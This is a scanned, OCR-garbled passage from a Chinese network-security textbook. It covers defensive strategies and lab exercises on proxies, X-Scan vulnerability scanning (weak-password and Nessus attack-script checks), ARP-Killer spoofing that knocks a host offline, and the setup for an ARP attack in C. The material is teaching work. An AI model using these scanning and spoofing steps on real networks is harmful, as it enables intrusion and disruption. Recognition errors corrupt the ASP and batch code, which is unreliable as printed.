访问 控制 是 网 络 安全 防范 和 保护 的 主要 策略 , 它 的 主要 任务 是 保证 网 络 资源 不 被 非法 
使 用 和 非常 访问 。 它 也 是 维护 网 络 系统 安全 ,保护 网 络 资源 的 重要 手段 。 各 种 安全 策略 必 
须 相 互 配合 才能 真正 起 到 保护 作用 ,但 访问 控制 可 以 说 是 保证 网 络 安 全 最 重要 的 核心 策略 
<— 


CD 入 网 访问 控制 : 为 网 络 访问 提供 第 一 层 访问 控制 ,控制 哪些 用 户 能 够 登录 到 服务 
器 并 获取 网 络 资源 ,控制 准许 用 户 入 网 的 时 间 和 准许 他 们 在 哪 台 工作 站 入 网 。 

用 户 的 入 网 访问 控制 可 分 为 用 户 名 的 识别 与 验证 .用 户口 令 的 识别 与 验证 .用 户 账号 的 
默认 限制 检查 三 个 步骤 。 三 道 关 卡 中 只 要 任何 一 关 未 过 ,该 用 户 便 不 能 进入 该 网 络 。 为 保 
证 口令 的 安全 性 ,用 户口 令 不 能 显示 在 显示 屏 上 ,口令 长 度 应 不 少 于 6 个 字符 ,口令 字符 最 
好 是 数字 .字母 和 其 他 字符 的 混合 。 

(2) 网 络 的 权限 控制 : 针对 网 络 非法 操作 所 提出 的 一 种 安全 保护 措施 。 用 户 和 用 户 组 
被 赋予 一 定 的 权限 ,网 络 控制 用 户 和 用 户 组 可 以 访问 哪些 目录 、 子 目录 、 文 件 和 其 他 资源 ,可 
以 指定 用 户 对 这 些 文件 目录、 设备 能 够 执行 哪些 操作 ,可 以 根据 访问 权限 将 用 户 分 为 特殊 
用 户 ( 即 系统 管理 员 )、 一 般 用 户 ( 系 统管 理 员 根 据 他 们 的 实际 需要 为 他 们 分 配 操作 权限 ) 和 
审计 用 户 ( 负 责 网 络 的 安全 控制 与 资源 使 用 情况 的 审计 ) 。 

(3) 目录 级 安全 控制 : 网 络 应 允许 控制 用 户 对 目录 文件 .设备 的 访问 。 用 户 在 目录 一 
级 指定 的 权限 对 所 有 文件 和 子 目 录 有 效 , 用 户 还 可 进一步 指定 对 目录 下 的 子 目 录 和 文件 的 
权限 。 

(4) 客户 端 安全 防护 策略 : 客户 在 使 用 网 络 时 ,应 该 有 意识 地 防范 网 络 攻 击 。 在 一 般 
情况 下 ,要 尽 可 能 切断 病毒 可 能 传播 的 途径 ,降低 受 感染 的 可 能 性 ; 在 安装 软件 时 ,要 注意 
软件 的 安全 性 ,等 等 。 

【 例 5-1) 设置 用 户 级 别 及 其 密码 。 

以 Windows XP 为 例 ,设置 用 户 级 别 及 其 密码 的 过 程 如 下 。 

CD 单 击 * 开 始 ” 一 “设置 "一 “控制 面板 ”命令 ,如 图 5-4 所 示 , 在 打开 的 窗口 中 单 击 “ 用 
户 账户 ”图 标 ,如 图 5-5 所 示 。 


Windows 2% Professional 


图 5-4 选择 命令 


(2) 打开 “用 户 账户 ”窗口 , 单 击 “创建 一 个 新 账户 ”链接 ,如 图 5-6 所 示 , 在 进入 的 界面 
中 输入 用 户 名 之 后 单 击 下 一 步 按钮 ,如 图 5-7 所 示 , 在 进入 的 界面 中 挑选 一 个 账户 类 型 ,如 
图 5-8 所 示 , 单 击 “ 创 建 账户 ”按钮 ,在 进入 的 界面 中 单 击 “ 创 建 账 户 ” 密 码 , 如 图 5-9 进行 密 
码 设置 ,如 图 5-10 所 示 , 单 击 “ 创 建 密码 ”完成 设置 。 

用 户 类 型 一 般 有 两 种 选择 ,可 以 根据 需要 选择 “计算 机 管理 员 ” 或 “ 受 限 用 户 ”, 受 限 用 户 
在 安装 程序 时 可 能 会 受到 限制 。 
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更 改 共 享 此 计算 机 的 用 户 的 用 户 帐户 设置 和 密码 。 


图 5-5 控制 面板 
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图 5-6 挑选 任务 
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图 5-7 设置 账户 名 称 
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来 安装 它 。 


同样 ， 在 Windows XP 或 Winacws 2000 之 前 设计 的 程序 可 能 在 委 限 制 的 帐户 中 不 能 
正确 运行 。 为 获得 最 佳 效果 ， 请 选择 有 Desi ened for Windows XP 答 标 的 程序 ,或 者 
要 运行 旧 的 程序 ， 选 择 “计算 机 管理 员 ” 帐 户 类 型 。 
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图 5-8 挑选 账户 类 型 
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图 $-9 选择 更 改 项 


TN 
(2) 正在 创建 一 个 实 全 密码 


g Ete rema 您 正在 为 tnt 088335. WRERRM, text HERMA ES MEEN 
* PE , 个 人 证 书 以 及 保存 的 同 站 或 同 络 资源 的 密码 - 
A 正在 记性 一 个 刘 码 


要 防止 在 将 来 技 失 数 涡 ,要求 test 制作 一 张 窑 码 重 设 软盘 。 
输入 一 个 新 密码 ; 
LLLI 


再 次 输入 密码 以 确认 
°°. 


加 果 密 码 包 合 大 写字 下 ,它们 等 次 都 必须 以 相同 的 大 小 写 方式 输入 。 


输入 一 个 单词 或 短语 作为 密码 提示 


[test 


所 有 使 用 这 台 计 算 机 的 人 大 可 以 看 见 密码 提示 。 


图 5-10 创建 密码 


3. 信息 加 密 策略 


信息 加 密 的 目的 是 保护 网 内 的 数据 ,文件 .口令 和 控制 信息 ,保护 网 上 传输 的 数据 。 网 
络 加 密 常用 的 方法 有 链 路 加 密 、 端 点 加 密 和 节点 加 密 3 种 。 链 路 加 密 的 目的 是 保护 网 络 节 
点 之 间 的 链 路 信息 安全 ; 端点 加 密 的 目的 是 对 源 端 用 户 到 目的 端 用 户 的 数据 提供 保护 ; 节 
点 加 密 的 目的 是 对 源 节点 到 目的 节点 之 间 的 传输 链 路 提供 保护 。 用 户 可 根据 网 络 情况 酌情 
选择 加 密 方式 。 


4. 网 络 服务 器 安全 控制 


网 络 允 许 用 户 在 服务 器 控制 台 上 执行 一 系列 操作 。 用 户 使 用 控制 台 可 以 装载 和 印 载 模 
块 , 可 以 安装 和 删除 软件 等 操作 。 网 络 服务 器 的 安全 控制 包括 设置 口令 锁定 服务 器 控制 台 ， 
以 防止 非法 用 户 修改 ,删除 重要 信息 或 破坏 数据 ; 设 定 服务 器 登录 时 间 限 制 及 非法 访问 者 
检测 和 关闭 的 时 间 间 隔 。 


5. 网 络 安全 管理 策略 


在 网 络 安全 中 ,除了 采用 上 述 技术 措施 之 外 ,加 强 网 络 的 安全 管理 ,制定 有 关 规 章 制 度 ， 
对 于 确保 网 络 的 安全 可靠 地 运行 ,也 能 起 到 十 分 有 效 的 作用 。 

网 络 的 安全 管理 策略 包括 确定 安全 管理 等 级 和 安全 管理 范围 .制定 有 关 网 络 操作 的 使 
用 规程 和 人 员 出 入 机 房管 理 制 度 、 制 定 网 络 系 统 的 维护 制度 和 应 急 措 施 等 。 


5.3.2 常用 的 安全 防范 技术 


为 了 保护 计算 机 ,需要 做 出 一 些 如 下 所 述 常用 的 措施 。 
1. 端口 扫描 的 防范 方法 


应 对 端口 扫描 的 防范 方法 有 如 下 两 种 。 

(1) 关闭 闲置 和 有 潜在 危险 的 端口 。 这 个 方法 的 本 质 是 将 所 有 用 户 需 要 用 到 的 正常 计 
算 机 端口 外 的 其 他 端口 都 关闭 。 因 为 就 黑客 而 言 ,所 有 端口 都 可 能 成 为 攻击 的 目标 。 

(2) 有 端口 扫描 的 症状 时 ,立即 屏蔽 该 端口 。 这 种 预防 端口 扫描 的 方式 显然 靠 用 户 自 
己 手工 是 不 可 能 完成 的 ,或 者 说 完成 起 来 相当 困难 ,需要 借助 网 络 防火 墙 。 


2. 网 络 监听 的 防范 方法 


CD 对 于 网 络 监听 攻击 ,可 以 采取 以 下 一 些 措 施 进行 防范 。 

。 网 络 分 段 : 一 个 网 络 段 包括 一 组 共享 低层 设备 和 线路 的 机 器 ,如 交换 机 、 动 态 集 线 
器 和 网 桥 等 ,可 以 对 数据 流 进 行 限制 ,从 而 达到 防止 嗅 探 的 目的 。 

* 加密 : 一 方面 可 以 对 数据 流 中 的 部 分 重要 信息 进行 加 密 , 另 一 方面 也 可 只 对 应 用 层 
加 密 , 但 后 者 将 使 大 部 分 与 网 络 和 操作 系统 有 关 的 敏感 信息 失去 保护 。 选 择 何 种 加 
密 方式 ,取决 于 信息 的 安全 级 别 及 网 络 的 安全 程度 。 

。 一 次 性 密码 技术 : 密码 并 不 在 网 络 上 传输 .而 是 在 两 端 进行 字符 串 匹配 ,客户 端 利 


实践 


用 从 服务 器 上 得 到 的 Challenge 和 自身 的 密码 计算 出 一 个 新 字符 串 , 并 将 之 返回 给 
服务 器 。 在 服务 器 上 利用 比较 算法 进行 匹配 ,如 果 匹 配 ,就 允许 建立 连接 ,所 有 
Challenge 和 字符 串 都 只 使 用 一 次 。 

。 划 分 VLAN: 运用 VLAN( 虚 拟 局 域 网 ) 技 术 将 以 太 网 通信 变 为 点 到 点 通信 ,可 以 防 
止 大 部 分 基于 网 络 监 听 的 人 侵 。 

(2) 对 可 能 存在 的 网 络 监听 的 检测 方法 有 以 下 几 种 。 

。 对 于 怀疑 运行 监听 程序 的 机 器 ,用 正确 的 IP 地 址 和 错误 的 物理 地 址 进行 ping, 运 行 
监听 程序 的 机 器 会 有 响应 。 这 是 因为 正常 的 机 器 不 接收 错误 的 物理 地 址 ,处 理 监听 
状态 的 机 器 能 接收 。 

。 向 网 上 发 大 量 不 存在 的 物理 地 址 的 包 。 巾 于 监听 程序 要 分 析 和 处 理 大 量 的 数据 包 
而 占用 很 多 的 CPU 资源 ,这 将 导致 性 能 下 降 ,进而 通过 比较 该 机 器 前 后 的 性 能 加 以 
判断 。 这 种 方法 难度 比较 大 。 

。 使 用 反 监听 工具 (如 Antisniffer) 等 进行 检测 。 


3. IP 欺骗 的 防范 方法 


CD 进行 包 过 滤 。 如 果 网 络 是 通过 路 由 器 接 人 Internet 的 ,那么 可 以 利用 路 由 器 来 进 
行 包 过 滤 。 确 信 只 有 内 网 主机 之 间 可 以 使 用 信任 关系 ,而 来 自 外 网 的 主机 希望 与 内 网 主机 
建立 连接 的 请 求 要 慎重 处 理 , 如 有 可 疑 之 处 ,应 立即 过 滤 掉 这 些 请 求 。 

(2) 使 用 加 密 方法 。 防 止 IP 欺骗 的 男 一 有 效 方 法 就 是 在 通信 时 进行 加 密 传输 和 验证 。 

CD 抛弃 IP 信任 验证 。IP 欺骗 主要 是 利用 建立 在 IP 地 址 上 的 信任 策略 ,而 伪造 IP 地 
址 就 可 以 取得 信任 ,进而 实施 攻击 。 


4. 密码 破解 的 防范 方法 


防范 密码 破解 的 办 法 很 简单 ,只 要 使 自己 的 密码 不 在 英语 字典 中 , 且 不 可 能 被 别人 猜测 
出 就 可 以 了 。 

保持 密码 安全 的 要 点 如 下 。 

(1) 不 要 将 密码 写 下 来 。 

(2) 不 要 将 密码 保存 在 电脑 文件 中 。 

(3) 不 要 选取 显而易见 的 信息 做 密码 。 

(4) 不 要 让 别人 知道 。 

(5) 不 要 在 不 同系 统 中 使 用 同一 密码 。 

(6) 为 防止 手 疾 眼 快 的 人 窃取 密码 ,在 输入 密码 时 应 确认 无 人 在 身边 。 

(7) 定期 改变 密码 。 


5. 拒绝 服务 的 防范 方法 


拒绝 服务 的 防御 策略 如 下 所 述 。 

CO 建立 边界 安全 界限 ,确保 输出 的 数据 包 受 到 正确 限制 ; 经 常 检测 系统 配置 信息 ,并 
建立 完整 的 安全 日 志 。 

(2) 利用 网 络 安全 设备 (例如 防火 墙 ) 加 固 网 络 的 安全 性 ,配置 好 设备 的 安全 规则 ,过滤 


掉 所 有 可 能 的 伪造 数据 包 。 

(3) 对 于 DDoS ,除了 策略 (1) 和 (2) 以 外 ,还 应 启动 应 付 策略 , 尽 可 能 快 地 追踪 攻击 包 ， 
并 且 要 及 时 与 有 关 应 急 组 织 联系 ,分 析 受 影响 的 系统 ,确定 涉及 的 其 他 节点 ,从 而 阻挡 已 知 
攻击 节点 的 流量 。 

(4) 对 于 DRDoS, 除 了 策略 (1)、(2) 和 (3) 以 外 ,还 应 及 时 联系 ISP 和 有 关 应 急 组 织 , 对 
数据 包 出 口 进 行 严 格 审查 ,如 果 发 现 伪 造 的 包 , 就 将 机 器 的 源 地 址 发 送出 去 。 


6. 具体 DoS 防范 方法 


(1) 死亡 之 ping 的 防范 方法 是 对 防火 墙 进行 配置 , 阻 断 ICMP 以 及 任何 未 知 协议 。 

(2) Teardrop 的 防范 方法 是 在 服务 器 上 应 用 最 新 的 服务 包 , 设 置 防火 墙 对 分 段 进行 重 
组 ,而 不 转发 。 

(3) TCP SYN 洪水 的 防范 方法 是 关 掉 不 必要 的 TCP/IP 服务 ,或 对 防火 墙 进行 配置 ， 
过 滤 来 自 同一 主机 的 后 续 连接 。 

(4) Land 的 防范 方法 是 更 新 系统 ,对 防火 墙 进行 配置 ,过 滤 掉 外 部 接口 上 入 栈 的 含有 
内 部 源 地 址 的 数据 包 。 

(5) Smurf 攻击 的 防范 方法 是 对 路 由 器 或 防火 墙 进行 设置 ,关闭 外 部 路 由 器 或 防火 墙 
的 广播 地 址 特性 ,从 而 防止 攻击 者 利用 你 的 网 络 攻击 他 人 ; 通过 在 防火 墙 上 设置 规则 ,丢弃 
ICMP 包 来 防止 被 攻击 。 

防火 墙 是 目前 使 用 最 广泛 的 一 种 网 络 安全 产品 。 而 现在 许多 杀毒 软件 也 会 设置 相应 的 
软件 防火 墙 , 可 以 在 一 定 程度 上 降低 被 病毒 感染 的 几率 。 防 火 墙 的 具体 情况 将 在 后 面 的 章 
节 里 详 述 。 

7. APT 攻击 防范 策略 


(1) 主机 文件 保护 类 : 不 管 攻击 者 通过 何 种 渠道 执行 攻击 文件 ,必须 在 个 人 电脑 上 执 
行 。 因 此 ,确保 终端 电脑 的 安全 即 可 以 有 效 防止 APT 攻击 。 主 要 思路 是 采用 白 名 单方 法 
来 控制 个 人 主机 上 应 用 程序 的 加 载 和 执行 情况 ,从 而 防止 恶意 代码 在 员工 电脑 上 执行 。 很 
多 做 终端 安全 的 厂商 就 是 从 这 个 角度 入 手 来 制定 APT 攻击 防御 方案 ,典型 代表 厂商 包括 
国内 的 金山 网 络 和 国外 的 Bit9 等 。 

(2) 大 数据 分 析 检 测 APT 类 : 该 类 APT 攻击 检测 方案 并 不 重点 检测 APT 攻击 中 的 
某 个 步骤 ,而 是 通过 搭建 企业 内 部 的 可 信 文 件 知识 库 全 面 收集 重要 终端 和 服务 器 上 的 文件 
信息 ,发 现 APT 攻击 的 蛛丝马迹 后 ,通过 全 面 分 析 海 量 数据 ,杜绝 APT 攻击 的 发 生 。 采 用 
这 类 技术 的 典型 厂商 是 RSA。 

(3) 恶意 代码 检测 类 : 该 类 APT 解决 方案 其 实 就 是 检测 APT 攻击 过 程 中 恶意 代码 的 
传播 步骤 ,因为 大 多 数 APT 攻击 都 是 采用 恶意 代码 来 攻击 个 人 电脑 以 进入 目标 网 络 , 因 
此 ,恶意 代码 的 检测 至 关 重要 。 很 多 做 恶意 代码 检测 的 安全 厂商 就 是 从 恶意 代码 检测 入 手 
来 制定 APT 攻击 检测 和 防御 方案 的 ,典型 代表 厂商 包括 FireEye。 

(4) 网 络 人 侵 检测 类 : 就 是 通过 网 络 边界 处 的 入 侵 检 测 系 统 来 检测 APT 攻击 的 命令 
和 控制 通道 。 虽然 APT 攻击 中 的 恶意 代码 变种 很 多 ,但 是 ,恶意 代码 网 络 通 信 的 命令 和 控 
制 通信 模式 并 不 经 常 变化 ,因此 ,可 以 采用 传统 的 入侵 检测 方法 来 检测 APT 通信 通道 。 典 


实践 


型 代表 厂商 有 飞 塔 (Fortinet) 。 
8. 防范 CC 攻击 


利用 Session 防范 CC 攻击 ,不仅 可 以 IP 认证 ,还 可 以 使 用 防 刷 新 模式 ,在 页 面 里 判断 
刷新 ,刷新 页 面 则 不 允许 访问 ,详细 实现 方法 代码 如 下 。 


<% 

if session("refresh")< 1 then 
Session("refresh") = session("refresh") + 1 
Response. redirect "index. asp" 

End if 

$> 


这 样 用 户 第 一 次 访问 会 使 得 Refresh 王 1, 第 二 次 访问 正常 ,第 三 次 拒绝 访问 ,认为 是 刷 
新 ,可 以 加 上 一 个 时 间 参 数 ,让 多 少时 间 人 允许 访问 ,这样 就 限制 了 对 耗 时 间 的 页 面 的 访问 ,对 
正常 客户 几乎 没有 什么 影响 。 

另外 ,通过 代理 发 送 的 HTTP_X_FORWARDED_FOR 变量 来 判断 使 用 代理 攻击 机 器 
的 真实 IP。 但 并 不 是 所 有 代理 服务 器 都 发 送 此 参数 。 该 功能 的 ASP 代码 如 下 。 


<% 
Dim fso0bject 
Dim tsObject 
dim file 
if Request. ServerVariables("HTTP_X_FORWARDED_FOR" ) = "" then 
response. write "无 代理 访问 " 
response. end 
end if 
Set fso0bject = Server.CreateObject("Scripting.FileSystemObject") 
file = server.mappath("CCLog. txt") 
if not fsoObject.fileexists(file) then 
fsoO0bject. createtextfile file, true, false 
end if 
set tsObject = fsoObject.OpenTextFile(file,8) 
tsObject.Writeline Request.ServerVariables("HTTP X FORWARDED FOR") 
&"["Request. ServerVariables("REMOTE ADDR")&"]"&now() 
Set fso0bject = Nothing 
Set tsObject = Nothing 
response. write "有 代理 访问 " 
%> 


生成 CCLog. txt 的 记录 格式 是 真实 IP. [代理 的 IP] 时 间 , 通 过 比较 真实 IP 出 现 的 次 
数 ,就 可 以 确定 攻击 源 。 将 以 上 代码 另存 为 Conn. asp 文件 ,替代 连接 数据 库 的 文件 ,所 有 
数据 库 请 求 就 都 连接 到 此 文件 ,很 快 就 能 发 现 攻 击 源 。 


设置 代理 服务 器 


与 直接 连接 到 Internet 相 比 , 使 用 代理 服务 器 能 保护 上 网 用 户 的 TP 地 址 ,从 而 保障 上 
网 安全 。 代 理 服务 器 的 原理 是 在 客户 机 (用 户 上 网 的 计算 机 ) 和 远程 服务 器 (如 用 户 想 访问 


远 端 WWW 服务 器 ) 之 间架 设 一 个 “中转 站 ”, 当 客户 机 向 远程 服务 器 提出 服务 要 求 后 ,代理 
服务 器 首先 截取 用 户 的 请 求 ,然后 代理 服务 器 将 服务 请 求 转交 远程 服务 器 ,从 而 实现 客户 机 


和 远程 服务 器 之 间 的 联系 。 很 显然 ,使 用 代理 服务 器 
后 ,其 他 用 户 只 能 探测 到 代理 服务 器 的 卫 地 址 ,而 不 是 
用 户 的 TP 地 址 ,这 就 实现 了 隐藏 用 户 IP 地 址 的 目的 , 保 


障 了 用 户 上 网 安全 。 
【实验 目的 】 
会 简单 设置 使 用 代理 服务 器 。 
【实验 步骤 】 
代理 的 设置 步骤 如 下 。 


CD 打开 IE. 3€ f£* T. H."— "Internet 选项 ”命令 ,如 


图 5-11 所 示 。 


(2) 打开 ”Internet 选项 ”对 话 框 ,切换 到 “连接 ”选项 


卡 , 单 击 “ 局 域 网 设置 ”按钮 ,如 图 5-12 所 示 。 
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(3) 在 打开 的 对 话 框 中 勾 选 “为 LAN 使 用 代理 服务 图 5-11 
器 ……” 复 选 框 ,然后 再 设置 代理 即 可 ,如 图 5-13 所 示 。 
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图 5-12 “连接 ”选项 卡 


选择 命令 
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图 5-13 “局 域 网 (LAN) 设 置 " 对 话 框 


【实验 目的 】 
通过 本 次 实验 ,要 求学 生理 解 漏洞 扫描 技术 的 原理 和 应 用 ,掌握 漏洞 扫描 工具 X-Scan 
的 应 用 ,能 通过 现 有 的 X-Scan 工具 对 所 扫描 的 主机 进行 分 析 , 得 出 主机 目前 的 安全 情况 。 


实践 


【实验 内 容 1] 

熟悉 X-Scan 界面 ,对 常用 菜单 项 进行 了 解 。 

(1)“ 基 本 设置 ?页 ,说明 如 下 

* 指定 IP 范围 : 可 以 输入 独立 IP 地 址 或 域名 ,也 可 输入 以 -和 ,分 隔 的 IP 范围 ,如 

“192. 168. 0. 1-192. 168. 0. 20,192. 168. 1. 10-192. 168. 1. 254", 

从 文件 中 获取 主机 列表 : 勾 选 该 复 选 框 ,将 从 文件 中 读 取 待 检测 主机 地 址 ,文件 格 

式 为 纯 文本 ,每 一 行 可 包含 独立 IP 或 域名 ,也 可 包含 以 -和 ,分 隔 的 TP 范围 。 

报告 文件 : 扫描 结束 后 生成 的 报告 文件 名 ,保存 在 LOG 目录 下 。 

报告 文件 类 型 : 目前 支持 TXT 和 HTML 两 种 格式 。 

保存 主机 列表 : 勾 选 该 复 选 框 ,扫描 过 程 中 检测 到 存活 状态 的 主机 将 自动 记录 到 列 

表 文 件 中 。 

。 列表 文件 : 用 于 保存 主机 列表 的 文件 名 ,保存 在 LOG 目录 下 。 

(2) 高 级 设置 页 ,说明 如 下 

最 大 并 发 线程 数量 : 扫描 过 程 中 最 多 可 以 启动 的 扫描 线程 数量 。 

最 大 并 发 主机 数量 : 可 以 同时 检测 的 主机 数量 。 每 扫描 一 个 主机 将 启动 一 个 

CheckHost 进程 。 

显示 详细 进度 : 在 主 界面 普通 信息 栏 中 显示 详细 的 扫描 过 程 。 

跳 过 没有 响应 的 主机 : 如 果 X-Scan 运行 于 NT4.0 系统 ,只 能 通过 ICMP ping 方式 

对 目标 主机 进行 检测 ,而 在 Windows 2000 以 上 版 本 的 Windows 系统 下 , 若 具 备 管 

理 员 权 限 , 则 可 通过 TCP ping 的 方式 进行 存活 性 检测 。 

。 跳 过 没有 检测 到 开放 端口 的 主机 : 若 在 用 户 指定 的 TCP 端口 范围 内 没有 发 现 开 放 
端口 ,将 跳 过 对 该 主机 的 后 续 检 测 。 

(3)“ 端 口 相关 设置 "页 说 明 如 下 。 

待 检测 端口 : 输入 以 -和 ,分 隔 的 TCP 端口 范围 。 

检测 方式 : 目前 支持 TCP 完全 连接 和 SYN 半 开 扫描 两 种 方式 。 

根据 响应 识别 服务 : 根据 端口 返回 的 信息 智能 判断 该 端口 对 应 的 服务 。 

主动 识别 操作 系统 类 型 : 端口 扫描 结束 后 采用 NMAP 的 方法 由 TCP/IP 堆栈 指纹 

识别 。 

【实验 内 容 2] 

设置 目标 操作 系统 。 

(1) 参数 设置 。 如 图 5-14 Bros ,打开 “扫描 参数 "对话 框 进行 全 局 核查 设置 。 

* 在 “全 局 设置 "界面 中 ,可 以 选择 线程 和 并 发 主机 数量 。 

° 在 “端口 相关 设置 "界面 中 可 以 自 定义 一 些 需要 检测 的 端口 。 检 测 方式 有 TCP. 

SYN 两 种 。 

"SNMP 相关 设置 ?主要 针对 简单 网 络 管理 协议 (SNMP) 信 息 的 一 些 检测 设置 。 

"NETBIOS 相关 设置 ?是 针对 Windows 系统 的 网 络 输入 输出 系统 (Network Basic 

Input/Output System) 信 息 的 检测 设置 ,NetBIOS 是 一 个 网 络 协议 ,包括 的 服务 有 

很 多 ,可 以 选择 其 中 的 一 部 分 或 全 选 , 如 图 5-15 所 示 。 
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Æ 5-15 NetBIOS 相关 设置 


° “E A A Dz 8” E 8 HJ F 6 PE PESE r A AE W HA i K d, a s 
CGI Wi £11ii , POP3 漏洞 扫描 、FTP 漏洞 扫描 、SSH 漏洞 扫描 及 HTTP 漏洞 扫描 
等 。 这 些 漏洞 扫描 基于 漏洞 库 ,将 扫描 结果 与 漏洞 库 相关 数据 匹配 比较 得 到 漏洞 信 
息 。 漏 洞 扫描 还 包括 没有 相应 漏洞 库 的 各 种 扫描 ,比如 Unicode 遍历 目录 漏洞 探 
W FTP 弱势 密码 探测 .OPENRelay 邮件 转发 漏洞 探测 等 ,这 些 扫 描 使 用 插件 (功能 
模块 技术 ) 进 行 模 拟 攻击 ,进而 测试 出 目标 主机 的 漏洞 信息 。 


实践 


(2) 开始 扫描 。 设 置 好 参数 以 后 , 单 击 “开始 扫描 ”按钮 即 可 开始 进行 扫描 ,X-Scan 会 
对 目标 主机 进行 详细 的 检测 。 扫 描 过 程 信息 会 在 主 界面 右 下 方 的 信息 栏 中 看 到 ,如 图 5-16 
所 示 。 
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图 5-16 扫描 过 程 信息 


CD 查看 扫描 结果 。 扫 描 结束 后 ,系统 默认 自动 生成 HTML 格式 的 扫描 报告 ,显示 目 
标 主 机 的 系统 、 开 放 端 口 及 服务 、 安 全 漏洞 等 信息 。 

【实验 内 容 3] 

在 MS-DOS 环境 下 练习 对 xscan. exe 的 使 用 。 

xscan. exe 使 用 命令 格式 : xscan -host <th IP [-— # jp IP>] — il H — [其 
他 选项 ] 

xscan -file 去 主机 列表 文件 名 > 所 检测 项 目 之 [其 他 选项 ] 。 

CD 去 检测 项 目 > 含义 如 下 。 

° -active: 检测 目标 主机 是 否 存活 。 

* -os: 检测 远程 操作 系统 类 型 (通过 NetBIOS 和 SNMP 协议 ) 。 

。 -port: 检测 常用 服务 的 端口 状态 。 

° -ftp: 检测 FTP 弱 口 令 。 

。 -pub: 检测 FTP 服务 匿名 用 户 写 权限 。 

* -pop3: 检测 POP3-Server 88 H4. 

e -smtp: 检测 SMTP-Server 漏洞 。 

* -sql: 检测 SQL-Server 58 H1, 


* -smb: 检测 NT-Server 弱 口 令 。 
° -iis: 检测 TIS 编码 /解码 漏洞 。 
。 -cgi: 检测 CGI 漏洞 。 
* -nasl: 加 载 Nessus 攻击 脚本 。 
* -all : 检测 以 上 所 有 项 目 。 
(2) [其 他 选项 ] 含义 如 下 。 
-i 二 适配器 编号 过: 设置 网 络 适配器 ,可 通过 “一 1” 参 数 获取 。 
-1: 显示 所 有 网 络 适 配器 。 
-v: 显示 详细 扫描 进度 。 
-p: 跳 过 没有 响应 的 主机 。 
-o: 跳 过 没有 检测 到 开放 端口 的 主机 。 
-t 三 并 发 线程 数量 [, 并 发 主机 数量 ] 二 : 指定 最 大 并 发 线程 数量 和 并 发 主机 数量 ， 
默认 数量 分 别 为 100 和 10, 
* -log 去 文件 名 二 : 指定 扫描 报告 文件 名 , TXT 或 HTML AA. 
【实验 内 容 4] 
通过 对 命令 的 熟悉 , 写 出 如 下 扫描 命令 。 
(1) 网 段 内 周围 主机 的 标准 端口 状态 ,NT 弱 口 令 用 户 , 最 大 并 发 线程 数量 为 100, 跳 过 
没有 检测 到 开放 端口 的 主机 。 
(2) 检测 网 段 内 周围 5 台 主 机 的 标准 端口 状态 ,CGI 漏洞 ,最 大 并 发 线程 数量 为 200, 同 
一 时 刻 最 多 检测 2 台 主 机 ,显示 详细 检测 进度 , 跳 过 没有 检测 到 开放 端口 的 主机 。 


CAR ARP-Killer 实验 


【实验 目的 】 

了 解 ARP 欺骗 的 原理 ,了 解 ARP-Killer 工具 的 使 用 方法 及 其 攻击 效果 。 

【实验 内 容 】 

A) 运行 ARP-Killer。 开 始 运行 时 , 单 击 “ 开 始 检 测 ” 按 钮 就 可 以 了 ,检测 完成 后 , 即 可 
看 到 IP 列表 ,如 果 相 应 的 IP 是 绿帽子 图 标 , 说 明 这 个 IP 处 于 正常 模式 ; 如 果 是 红帽子 , 则 
说 明 这 个 网 卡 处 于 混杂 模式 。 

(2) ARP 欺骗 

* 用 Arp-Killer 冒充 IP, 选 择 发 送 请 求 包 , 输 入 目的 起 始 IP 和 终止 IP, 输 入 要 冒充 的 
IP, 再 填 上 一 个 假 的 MAC. 就 可 以 发 送 了 ,这 个 过 程 中 可 以 设 为 循环 ,此 时 被 冒充 的 
IP 将 无 法 上 网 。 

用 Arp-Killer HC IP. 选择 发 送 应 答 包 ,输入 
被 欺骗 主机 的 TP 和 他 的 MAC 地 址 ,再 输入 原 
主机 的 他 ,目的 他 地 址 任意 ,不 填 也 可 以 (也 
可 以 指向 自己 的 JP), 具 体 设 置 如 图 5-17 
所 示 。 

ARP 攻击 防范 批 处 理 代码 (IP 十 MAC 绑 定 ) 如 下 。 图 5-17 ARP 欺骗 


实践 


@echo off 

: : 读 取 本 机 Mac 地 址 

if exist ipconfig.txt del ipconfig.txt 

ipconfig /all > ipconfig. txt 

if exist phyaddr. txt del phyaddr. txt 

find "Physical Address" ipconfig. txt > phyaddr. txt 

for /f "skip = 2 tokens = 12" % %M in (phyaddr.txt) do set Mac- % &M 
NREL ip 地 址 

if exist IPAddr. txt del IPaddr. txt 

find "IP Address" ipconfig. txt > IPAddr. txt 

for /f "skip-2 tokens- 15" % % I in (IPAddr.txt) do set IP= % &I 
11 8 E 3 BL IP 地 址 和 MAC 地址 

arp -s %IP% %Mac% 

:: 读 取 网 关 地 址 

if exist GateIP.txt del GateIP. txt 

find "Default Gateway" ipconfig.txt > GateIP.txt 

for /f "skip = 2 tokens = 13" % % G in (GateIP.txt) do set GateIP- % % G 
11 BE R 8] X Mac 地 址 

if exist GateMac. txt del GateMac. txt 

arp -a &GateIP$ »GateMac. txt 

for /f "skip = 3 tokens - 2" % &H in (GateMac.txt) do set GateMac- % &H 
: : 绑 定 网 关 Mac 和 IP 

arp -s *GateIP$ 5 GateMac * 


ARP 攻击 的 C 语言 实现 


【实验 目的 】 

掌握 ARP 攻击 的 原理 与 VC 实现 的 具体 方法 。 

【实验 环境 】 

VC6.0 Winpcap Wpdpack 

【实验 步骤 】 

程序 基于 C 语言 ,利用 winpacp 实现 往 局 域 网 内 发 自 定义 的 包 , 以 达到 ARP 欺骗 的 目的 。 

(1) 登录 网 站 http://www. winpcap. org/archive/ 下 载 WpdPack4. 0betal 和 WinPcap 
4. Obetal, exe, 

(2) 安装 WinPcap. exe, 然 后 在 C:\Program Files WinPcap 目录 下 打开 rpcapd. exe 服务 。 

(3) 在 VC 中 选择 Tools — Options — Directories 命令 配置 include 和 library. 将 
WpdPack 中 的 include 和 library 库 包 含 进去 ,比如 把 4. 0betal-WpdPack 放 在 D 盘 根 目录 
下 ,结果 如 图 5-18、 图 5-19 所 示 。 


平台 四 EFS: 
[wina2 E [Include files x] 
路径): nx 


'sMicrosoft Visual StudioWC98VNCLUDE 
sMicrosoft Visual StudioyYC984MFCWNCLUDE 
rogram Files\Microsoft Visual StudioWC38VATLVNCLUDE 


图 5-18 € & include 


台 EISE 
[Win32 cj [Library files z] 


D4Program Files\Microsoft Visual StudiolVC98M IB. 


D:\Program Files\Microsoft Visual StudiolVC984MF 


图 5-19 包含 librany 


(4) 选择 Project^ Settings Link Object/library Modules 命令 ,打开 设置 对 话 框 ,在 
